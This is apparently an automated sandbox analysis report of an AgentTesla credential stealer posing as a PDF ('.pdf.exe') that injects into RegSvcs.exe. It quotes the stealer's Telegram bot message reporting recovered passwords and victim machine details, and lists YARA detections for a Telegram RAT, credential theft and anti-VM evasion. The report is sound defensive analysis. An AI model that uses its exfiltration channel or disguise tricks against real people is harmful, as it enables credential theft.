                                                                      {"ok":true,"result":{"message_id":971,"from":{"id":2122434962,"is_bot":true,"first_name":"w4kejohn","username":"w4kejohnbot"},"chat":{"id":2124798776,"first_name":"John","last_name":"Cena","username":"joebest123","type":"private"},"date":1642164941,"document":{"file_name":"user-123716 2022-01-14 04-56-56.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAIDy2Hhcs1UJByddqGIFcm3-QKtM09yAAJlCgACftAQU3yvjxPnf62JIwQ","file_unique_id":"AgADZQoAAn7QEFM","file_size":439},"caption":"New PW Recovered!\n\nUser Name: user/123716\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB"}}


                                                                      Code Manipulations

                                                                      Statistics

                                                                      Behavior

                                                                      Click to jump to process

                                                                      System Behavior

                                                                      General

                                                                      Start time:13:53:52
                                                                      Start date:14/01/2022
                                                                      Path:C:\Users\user\Desktop\20220114080343434.pdf.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\20220114080343434.pdf.exe"
                                                                      Imagebase:0x870000
                                                                      File size:589824 bytes
                                                                      MD5 hash:CD9290D22BB18CED32A1B81814888382
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.312683612.0000000002E79000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:low

                                                                      General

                                                                      Start time:13:54:03
                                                                      Start date:14/01/2022
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Imagebase:0xb0000
                                                                      File size:45152 bytes
                                                                      MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high

                                                                      General

                                                                      Start time:13:54:04
                                                                      Start date:14/01/2022
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      Imagebase:0xf80000
                                                                      File size:45152 bytes
                                                                      MD5 hash:2867A3817C9245F7CF518524DFD18F28
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:.Net C# or VB.NET
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000002.553231861.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.309593341.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.309593341.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.557166211.00000000036A7000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000000.309117965.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000008.00000000.309117965.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                      Reputation:high

                                                                      Disassembly

                                                                      Code Analysis

                                                                      Reset < >